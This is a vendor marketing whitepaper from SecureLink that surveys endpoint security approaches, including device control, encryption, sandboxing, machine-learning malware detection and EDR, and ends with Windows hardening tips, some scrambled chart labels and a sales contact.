SO YOU THINK
YOU ARE PROTECTED?
THINK AGAIN!
NEXT GENERATION ENDPOINT SECURITY
www.securelink.net
BACKGROUND
Macro trends like cloud and mobility change the
requirements for endpoint security. Data can be
stored on premise, in public clouds, or at the
endpoints and needs to be protected and available
24x7 regardless of where it resides.
At the same time this data is a high-value
target for today’s organized crime. The total
global impact of cybercrime has risen to USD 3
trillion, making it more profitable than the global
trade in marijuana, cocaine and heroin combined.
So how can you keep your data and business
protected without losing the agility required
to compete in your quickly evolving marketspace?
www.securelink.net
CHALLENGES
Antivirus/anti-spyware databases are 90-99% effective at
detecting well-known, widely circulating threats. However, they are only
20-50% effective at detecting new or low-volume threats.
KNOWN VS UNKNOWN THREATS
Historically the technical battle between cybercrime and protection has been very reactive. First
a threat needs to present itself, then the industry
can mitigate this threat by writing different types
of signatures to detect and block it.
Some examples:
Some examples:
A malicious file is found and an antivirus signature is written to match the exact fingerprint of
the file to be able to detect and block it.
•
A critical SCADA system may not require a
lot of interaction with the outside world, so
by isolating it from a network point of view,
the risk of infection or attack could be massively reduced.
•
The software running on a Point-of-Sales terminal should probably not change that often,
so by locking down what applications that are
allowed to run, the risk is massively reduced.
The above examples do however not work very
well on “normal” end-users’ laptops, since endusers often require a lot of interaction with the
outside world, hence also a flexibility to update
and add software they need in order to be able to
do their job.
Forensics of an infected endpoint provides a set
of IOCs (Indicators of Compromise). These can
be shared across endpoints/customers/industries to find other infected endpoints.
A botnet is discovered. The IP addresses and/
or URLs of the command and control servers
(C&C) are identified and shared to help block
C&C connections and identify infected endpoints.
To address the above challenges, the security
industry has come up with a selection of different
approaches to manage the risks with related to
end-user needs and behavior. They all have their
advantages and disadvantages. The next section
provides an overview of some important types of
endpoint security features and their respective key
benefits.
This type of functionality is important to help us
detect and protect against well-known threats.
But, since there is no such thing as 100% protection, how can we protect better against the
unknown?
There are a number of alternative technical
approaches to better protect against unknown
threats. Which one chooses to use depends on
the balance between the need for security on one
hand and the demands on availability and agility on
the other hand.
IT IS ALL ABOUT BALANCE
3
www.securelink.net
ENDPOINT
SECURITY
CATEGORIES
To mitigate this threat there are Device Control
features available that will help you control what
users plug into their laptops. This helps increase
security, but the big challenge lies in providing an
effective work environment and managing
real-world situations, such as when the CEO calls
and has an issue with downloading pictures from
his smartphone.
In the best of worlds all the endpoint security
needed would be available in one product, or
even better, just integrated into the operating
system. This is however unfortunately not the
case. There are many different types of features needed and different vendors excel in
different areas. The following are some of the
more common and important areas.
02. COMPLIANCE
Many of the different security standards (PCI, CIS,
NIST, etc) recommend or require that as soon as
a system is put in a known and trusted state, all
subsequent changes are detected and logged.
To enable this, there are File Integrity Monitoring
features that monitor all changes, log them and
compare them to different best practices and
compliance frameworks. This helps detect suspicious or unauthorized deviations and changes.
01. PERIPHERAL DEVICE SECURITY
Somewhat simplified, peripheral devices can be
viewed as basically all the things you connect to
your USB port. This includes USB memory sticks,
keyboards, external harddrives, etc.
03. SECURE ACCESS
Information is worthless if it is not available to
those who need it. In order to provide secure
access to company information, organizations
need to control who has access to what. It is also
important to ensure that information can not be
eavesdropped or modified during transit, and that
access is not provided to an infected endpoint
that could steal information and infect other
devices.
One popular way of getting into companies is the
so called “candy drop”, i.e. to spread infected USB
sticks in the public areas of a company, hoping that
someone will pick it up and connect it to their
laptop.You could argue that no-one would be so
unaware that they click on a file from an unknown
USB key. However, too many people do, and for
those that do not, the cybercrime industry actually
thought of that too.
The USB standard is written so that the device
will tell the laptop what type of device it is. This
means that by just stating that it is a keyboard
the USB key can actually just execute its own
code once connected to the laptop (even though
autorun is disabled).
Secure access can be divided
into two different categories:
Remote access (often referred to as VPN or
SSL-VPN)
Local Access (often referred to as NAC
(Network Access Control)
Secure Access functionality can be part of the OS,
included in an endpoint security product, or added
as a stand-alone software that specializes in only
providing this functionality.
4
www.securelink.net
04. DATA SECURITY
Disk encryption
This is used to prevent data from being accessed if your device is stolen or lost. The drawback is that
once you start your machine the disk is decrypted so a malware on your laptop will have access to
unencrypted data as soon as the laptop is started.
File encryption
This is used to protect very sensitive files. The files are only decrypted when they are accessed, so a
malware will not have access to unencrypted data. Please note that advanced malware can record your
keystrokes to get hold of decryption passwords and decrypt the files.
Data Loss Prevention
This is a feature that is designed to detect potential data breach and data exfiltration by detecting, monitoring and blocking sensitive data. Large-scale implementations of DLP aimed at achieving full value from
the solutions, typically means that your data needs to be classified by your company in order to get the
proper level of protection.
HOW DO YOU
KEEP YOUR DATA
AND BUSINESS
PROTECTED
WITHOUT LOSING
AGILITY TO
COMPETE IN YOUR
MARKETSPACE?
5
www.securelink.net
05. EXPLOIT PROTECTION
A common way to infect an endpoint is to send
a PDF or office document that is infected with
malicious code. When the end-user opens the
document it executes the code that exploits a vulnerability in the application opening the document.
06. MALWARE PROTECTION
Traditionally, the main task for antivirus products
has been to detect malicious programs. This has
historically been done by creating signatures for
every new malware that is detected, push this to
all the endpoints that can then detect the
malware.
Since there are several hundreds of thousands
of new malware created every day, this approach
is no longer optimal. In addition, this also requires that someone else has already found the
malware so that a signature can be written for it.
This means that you can only protect against the
known and not the unknown.
To protect against such application and
memory based exploits there are a couple of
different features available:
HostIPS (HIPS):
There is no standard terminology for different
HIPS techniques, but it typically includes some
type of signature-based detection to find exploits towards known vulnerabilities.
Below are some of the different options
available for protecting against malware:
Exploit Mitigation/Traps:
Inject code that will detect when code tries to
do malicious activity.
Malware Signatures
– Traditional Antivirus
The main benefit of signature-based detection is
that the malware is known, meaning that there
is often additional information available about
the malware and what it tries to do.
Memory Protection:
Protect against memory exploits, process injections and escalations.
A drawback with signatures is that they are
reactive and provide very limited protection
against zero-day malware and targeted attacks.
Threat Intelligence
Adding a feed of IPs or URLs of known malicious domains or botnets to the analysis, means
that connection to these sites can be blocked
to prevent download of malware or callbacks to
such domains.
This is generally a very good complement for
detection, but it is still reactive since someone
needs to detect these domains and they seldom
have a long lifespan.
IN THE BEST OF WORLDS
ALL THE ENDPOINT SECURITY
NEEDED WOULD BE AVAILABLE
IN ONE PRODUCT, OR EVEN BETTER, JUST
INTEGRATED INTO THE OPERATING SYTEM.
THIS IS HOWEVER
UNFORTUNATELY NOT THE CASE.
6
www.securelink.net
Application Control
By only allowing specified applications to run
(white listing), a malicious process cannot start.
Application control is a good solution for
devices in the “Internet of Things” space that
do not update or add software often. It is more
cumbersome to manage for normal end-user
laptops that are more dynamic and heterogeneous in nature.
Sandboxing/Emulation
This concept means sending unknown files to a
controlled environment where they are executed. Once executed the behavior is monitored
to look for malicious activity.
This can help detect zero-day malware based
on the execution behavior and also create
threat intelligence that can help detect other
infected endpoints.
Sandboxing typically means a delay in delivery
of the file to the target, while the suspicious file
is executed and analyzed.This means that it is
a common and good feature for mail and web
gateways, but maybe not optimal for all endpoint deployments.
For endpoints there are some things to consider:
Endpoint Isolation
Location: Are you running the sandbox platform locally or in the cloud?
This concept leverages different virtualization
techniques, e.g. micro-virtualization, to execute
files locally on the laptop in a separate sandbox.
This prevents the malicious file from reaching
the operating system. Once the session is over,
the virtual environment is discarded.
Scalability: If locally, how many devices do you
need to support all of your endpoints?
Remote users: How will remote users send
files to the sandboxes?
The main benefit is that no files need to be sent
away for scanning in sandboxes and that nothing
should leave the local sandbox.
Delay: There will be a delay while waiting for
the file to finish running in the sandbox. Is this
acceptable to the end-user?
A drawback is that this concept usually has a
performance impact on the endpoint and that
the isolation vendor needs to certify all OSs
and applications that are supported.
“Patient Zero effect”: If, for delay reasons,
you are allowing the file to be locally executed while the analysis is still being performed,
this first laptop (Patient Zero) will be infected
before you can stop future attacks. How do you
manage this patient zero effect?
For environments running standard OS and
applications and that can enforce that no other
applications can be run outside of the isolation
environment, this can be a good approach to
ensure that execution of malicious code is only
done in the virtual environment.
Evasion: How good is the sandbox technology
at detecting different evasion techniques?
7
www.securelink.net
Machine learning
Machine learning is today a common tool to solve complex problems in an effective way. Things like voice
recognition, consumer profiling and insurance companies are using different type of machine learning to
learn patterns and quickly categorize new events in a correct way.
For malware detection machine learning means identifying millions of different characteristics of a file,
then run millions of good and bad files into a large advanced system for machine learning to understand
the differences in these characteristics between good and bad files.
This means that a malware can be detected regardless of how many times it is rewritten to change its
fingerprint, since the characteristics will be the same and be identified as bad. The verification will be
done by a mathematical model that, will examine a file prior to execution and provide a sub-second verdict based on advanced algorithms.
This model has a very small impact on system performance and is not depending on any external signatures or sandboxes to detect and block zero-day malicious files from executing.
This approach works well in all different types of environments and could complement or replace traditional signature-based antivirus in most cases.
07. DETECTION & RESPONSE
There is no such thing as 100% protection, so how should you respond when you detect breached endpoints and do you have the tools to respond to this breach. When an infected endpoint is found inside
the company there are a lot of questions that you would like to be able to answer:
•
•
•
•
•
•
Is any other endpoint infected?
When was this endpoint infected?
How was it infected?
What type of information is at risk?
Has any data been stolen?
Who did it and why?
To help customers with incident response there is a specific set of tools referred to as ”Endpoint Detection & Response” tools. They provide very advanced functionality for helping to quickly understand the
impact of the breach and will help respond against it.
8
www.securelink.net
TOP 5 TIPS FOR SECURING
YOUR WINDOWS ENDPOINT!
Do not allow execution of unsigned programs from a users profile
directory.
Reason: A common location for malware to install itself to.
(Require exceptions)
Disable support for executing Javascript, Java and Visual Basic
scripts outside of the web browser.
Reason: A common attach vector. (Could require changes of administration
via scripts)
Upgrade PowerShell to version 4, enable logging and disable execution
of unsign scripts.
Reason: Built-in security functions and much more detailed logging.
Do not allow or limit the usage of local administrative privileges.
Reason: Should an attacker infect a user with local administrative
privileges, it would give the attacker the same privileged access.
Enforce separation of duties between daily work and system access.
Strong authentication, preferable a secure vault with functionality to mask the password.
Reason: The first thing an attacker would like to get is access to privileged accounts. Implementing
privileged account security will limit the impact of the breach and also enable detection of it.
9
www.securelink.net
PROTECT YOUR DATA,
IN USE, AT REST AND IN TRANSIT!
www.securelink.net
SUMMARY
Today’s protection of endpoints can and should
include many different protective measures,
to ensure protection against different types of
threats. Different vendors have solutions for one
or several of the threat types. However, the core
functionality of endpoint protection, to protect
against malicious code, is an area where the bad
guys have outrun the security vendors by far over
the last years. Only recently have new technologies emerged, that try to attack the problem with
new methods and tools.
These new types of protection methods are so
called disruptive innovations in the endpoint
market. They have moved away from the traditional signature-based detection to try to find more
effective methods.
As an organization looks at securing its endpoints,
it is important to identify and prioritize the different needs and requirements on endpoint protection. Different solutions are good for different
types of deployments, and the organization may
very well end up with needing more than one
endpoint protection agent to protect themselves.
These new technologies include machine-based
learning (algorithm-based detection), virtualization
techniques, etc.
l
Use-cases covered
pp
up
ts
rve
u
yc
rke
a
dm
Ol
Current
Endpoint Protection
ket
Old mar
w
Ne
Use-cases covered
curve
demand
t
rke
a
m
e
urv
c
ply
p
sup
a
t dem
marke
New
rve
nd cu
Protections against
unknown threats
Next Generation
Endpoint Protection
Time
The picture illustrates how existing, traditional signature-based endpoint protection products often include many of the modules described above. However, they are not really solving the market demand of
protecting against unknown threats.
The newer, innovative endpoint protection vendors are focused on addressing this, but they may not yet
have all the modules customers are looking for. As the innovative vendors develop their products and
capabilities, it is however very likely that we will see a big shift in the endpoint protection market.
If you would like to discuss which endpoint solution that will best address your specific needs,
please contact your local SecureLink sales representative.
11
www.securelink.net
WWW.SECURELINK.NET